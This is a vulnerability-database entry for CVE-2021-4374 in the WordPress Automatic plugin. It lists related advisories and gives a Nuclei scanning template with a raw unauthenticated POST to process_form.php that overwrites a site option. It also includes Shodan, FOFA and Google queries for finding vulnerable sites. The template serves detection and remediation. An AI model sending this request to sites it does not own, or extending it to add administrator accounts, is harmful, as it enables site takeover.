| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Exploit for Missing Authorization in Valvepress Wordpress_Automatic_Plugin | 9 Nov 202523:01 | – | githubexploit | |
| CVE-2021-4374 | 5 Nov 202112:13 | – | circl | |
| WordPress Plugin WordPress Automatic 安全漏洞 | 7 Jun 202300:00 | – | cnnvd | |
| CVE-2021-4374 | 7 Jun 202301:51 | – | cve | |
| CVE-2021-4374 WordPress Automatic Plugin <= 3.53.2 - Unauthenticated Arbitrary Options Update | 7 Jun 202301:51 | – | cvelist | |
| EUVD-2021-34201 | 3 Oct 202520:07 | – | euvd | |
| WordPress Plugin Automatic Config Change to RCE | 5 Nov 202117:43 | – | metasploit | |
| CVE-2021-4374 | 7 Jun 202302:15 | – | nvd | |
| CVE-2021-4374 | 7 Jun 202302:15 | – | osv | |
| Authorization | 7 Jun 202302:15 | – | prion |
id: CVE-2021-4374
info:
name: WordPress Automatic Plugin - Unauthenticated Options Change
author: intelligent-ears
severity: critical
description: |
WordPress Automatic Plugin (versions 3.53.2 and below) contains a critical vulnerability that allows unauthenticated users to change arbitrary WordPress options through the process_form.php script. The vulnerable script uses update_option() on all POST parameters without authentication or capability checks, allowing attackers to create administrator accounts or modify critical settings. The vulnerability can be exploited even if the plugin is deactivated as it's a standalone script.
impact: |
Unauthenticated attackers can update arbitrary WordPress options via process_form.php, enabling them to create administrator accounts, modify critical settings, or completely compromise the WordPress site.
remediation: |
Upgrade to WordPress Automatic Plugin version 3.53.3 or later, or deactivate and delete the plugin.
reference:
- "https://www.wordfence.com/blog/2021/09/critical-vulnerability-fixed-in-wordpress-automatic-plugin/"
- "https://nvd.nist.gov/vuln/detail/CVE-2021-4374"
classification:
cve-id: CVE-2021-4374
epss-score: 0.16408
epss-percentile: 0.96594
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-862
cpe: cpe:2.3:a:valvepress:wordpress_automatic_plugin:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: valvepress
product: wp-automatic
fofa-query: "wp-content/plugins/wp-automatic/"
google-query: inurl:"/wp-content/plugins/wp-automatic/"
shodan-query: 'http.html:"wp-content/plugins/wp-automatic/"'
tags: cve,cve2021,wp,wordpress,wp-plugin,wp-automatic,unauth,intrusive,vkev
http:
- raw:
- |
POST /wp-content/plugins/wp-automatic/process_form.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
field1={{randstr}}&field3=test&field4=test&field5=test&field6=test&blogdescription={{randstr}}
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{{randstr}}'
- type: status
status:
- 200
# digest: 490a0046304402207a884377c601af08d4094559b8b6d9700acd7c7334ae4da3b6514d734d5bc93d0220655dc1648b3a7a14f9a03f5c21c8a1f18ae154edfe8e908f378a1a295c3b5c1f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation